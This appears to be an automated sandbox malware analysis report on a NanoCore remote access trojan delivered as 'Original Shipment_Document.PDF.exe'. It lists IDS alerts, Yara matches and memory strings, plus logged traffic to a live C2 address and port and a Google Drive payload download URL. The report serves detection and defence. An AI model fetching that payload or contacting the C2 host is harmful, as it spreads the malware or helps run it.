Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49891 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49891 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49892 -> 188.127.230.176:4726
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 188.127.230.176:4726 -> 192.168.11.20:49892

Yara detected Generic Downloader

Source: Yara match

File source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie1disn24fvm7mb2d8jibr4j1v/1659691950000/06422039211485589527/*/1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r?e=download&uuid=fa4270ed-3082-4e6e-8e77-e38f9ee0c1fd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-70-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49794 -> 188.127.230.176:4726

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000088.00000003.186209483638.0000000001241000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.185951105666.0000000001241000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.185946644468.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000088.00000003.185946644468.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: Original Shipment_Document.PDF.exe, windows.exe.136.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000088.00000003.185946644468.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: CasPol.exe, 00000088.00000003.186565322060.0000000001202000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186517811821.0000000001201000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.185951314480.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-14-70-docs.googleusercontent.com/
Source: CasPol.exe, 00000088.00000003.185950717846.0000000001214000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-14-70-docs.googleusercontent.com/%%doc-14-70-docs.googleusercontent.com
Source: CasPol.exe, 00000088.00000003.185946644468.000000000122A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-14-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie
Source: CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r
Source: CasPol.exe, 00000088.00000003.186345012682.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186246224448.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186438307331.00000000011D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2roiA
Source: CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/x~

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie1disn24fvm7mb2d8jibr4j1v/1659691950000/06422039211485589527/*/1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r?e=download&uuid=fa4270ed-3082-4e6e-8e77-e38f9ee0c1fd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-70-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.179.174:443 -> 192.168.11.20:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49792 version: TLS 1.2

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

Source: Conhost.exe	Process created: 63
Source: cmd.eXe	Process created: 119

System Summary

Malicious sample detected (through community Yara rule)

Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: CasPol.exe PID: 4156, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 4156, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Original Shipment_Document.PDF.exe

Executable has a suspicious name (potential lure to open the executable)

Source: Original Shipment_Document.PDF.exe

Static file information: Suspicious name

Source: Original Shipment_Document.PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 136.3.CasPol.exe.1ed365d7.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 136.3.CasPol.exe.1ed1c57e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 136.3.CasPol.exe.1ed1c57e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 136.3.CasPol.exe.1ed365d7.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 136.3.CasPol.exe.1ed30ba9.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: CasPol.exe PID: 4156, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CasPol.exe PID: 4156, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Code function: 1_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_00406BFE
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_718D1BFF
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328F608
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03290DE4
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281329
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328032E
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289B38
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280B39
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281B3F
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281730
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03282731
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280B00
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280F17
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280B6D
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328076E
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281365
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280366
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281B71
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281774
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03286775
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03291B4A
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328FB4E
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280F59
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289F53
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280BAB
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032817A4
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032803A4
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281BB9
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032873B1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280F94
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032817FB
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328A3F0
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032803F1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280BF7
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032817CE
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280FD8
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032807D2
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281BD7
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280E29
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281A2A
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328122D
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328022E
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280E24
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280634
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03284608
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03293E12
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280A15
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280262
